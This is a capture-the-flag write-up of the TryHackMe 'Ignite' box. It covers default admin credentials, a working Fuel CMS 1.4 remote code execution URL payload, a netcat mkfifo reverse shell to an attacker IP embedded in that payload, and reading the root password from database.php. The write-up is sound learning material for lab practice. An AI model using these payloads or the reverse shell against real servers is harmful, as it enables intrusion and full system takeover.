---
layout: post
title:  "THM - Ignite"
date:   2020-07-19 06:00:00 +1000
category: hacking
---

## Introduction
*A new start-up has a few issues with their web server.*  

This is another easy rated box. Let's begin.

## Ports
nmap says we've got 80 (HTTP); I originally cancelled this scan about 60% in since it was running slowly. Later I ran it again in case there was something I'd missed, but no. So it's web all the way.

## Webserver
The front page of the website shows it is running a fresh install of Fuel CMS version 1.4 and even shows the default credentials are **admin:admin**.

Checking searchsploit, there is an RCE vulnerability in Fuel version 1.4.1, so that looks promising. There is no metasploit module, but a python (2) script. 

## Payload
The payload from the script is essentially:

``
/fuel/pages/select/?filter=%27%2bpi%28print%28%24a%3d%27system%27%29%29%2b%24a%28%27COMMAND_HERE%27%29%2b%27
``

Where the words COMMAND_HERE are replaced with the command you want to execute, such as pwd, whoami, ls etc.

## Shell
The [pentest monkey](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) alternative netcat shell works fine, provided it is URL encoded (ctrl+u in Burp Suite).

So:

``
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.10.123 1234 >/tmp/f
``

when URL encoded and inserted into the payload becomes

``
/fuel/pages/select/?filter=%27%2bpi%28print%28%24a%3d%27system%27%29%29%2b%24a%28%27rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.9.10.123+1234+>/tmp/f%27%29%2b%27
``

We start our listener and send this with Burp Repeater; we're in as www-data and can read the user flag.

## Root
I spent what felt like quite a bit of time looking for some vulnerability in the server, but ultimately I couldn't find one. That means we needs credentials - essentially the password for root.

Spoiler alert: This can be found in:
>www-data@ubuntu:/var/www/html/fuel/application/config$ cat database.php

Once you've got it, it's **su root** and that's it.

